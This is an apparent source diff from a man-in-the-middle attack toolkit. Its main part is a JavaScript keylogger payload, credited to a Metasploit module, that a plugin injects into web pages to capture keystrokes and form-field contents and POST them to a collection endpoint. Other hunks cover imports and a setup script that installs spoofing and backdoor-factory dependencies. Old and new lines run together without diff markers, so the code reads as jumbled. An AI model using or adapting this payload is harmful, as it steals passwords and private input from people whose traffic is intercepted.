#Stolen from the Metasploit module http_javascript_keylogger

@@ -43,7 +52,7 @@ class jskeylogger(Inject, Plugin):
payload = """<script type="text/javascript">
window.onload = function mainfunc(){
var2 = ",";

name = '';
function make_xhr(){
var xhr;
try {

@@ -80,30 +89,59 @@ document.onkeydown = function1;
}

}
function function2(e){

function function2(e)
{
srcname = window.event.srcElement.name;
var3 = (window.event) ? window.event.keyCode : e.which;
var3 = var3.toString(16);
if (var3 != "d"){
function3(var3);
}
}
function function1(e){
var3 = (window.event) ? window.event.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13){
function3(var3);

if (var3 != "d")
{
andxhr(var3, srcname);
}
}

function function3(var3){
var2 = var2 + var3 + ",";
function function1(e)
{
srcname = window.event.srcElement.name;
id = window.event.srcElement.id;

var3 = (window.event) ? window.event.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(var3, srcname);
}
else if (var3 == 0)
{

text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(text.toString(16), srcname);
}
}
}

function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}

var2= var2 + key + ",";

xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(var2);
xhr.send(var2 + '&&' + inputName);

if (var3 == 13 || var2.length > 3000)
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}
</script>"""

return payload
@@ -20,11 +20,7 @@ from base64 import b64decode
from urllib import unquote
import binascii
import random

try:
from configobj import ConfigObj
except:
sys.exit('[-] configobj library not installed!')


class Spoof(Plugin):
1 setup.sh
@@ -6,6 +6,7 @@ fi

apt-get install python-scapy python-dns python-pip msgpack-python python-nfqueue python-imaging -y
apt-get install python-twisted-web python-dnspython python-requests python-configobj python-pefile -y
pip install pyyaml ua-parser user-agents
git submodule init
git submodule update
cd libs/bdfactory/ && ./install.sh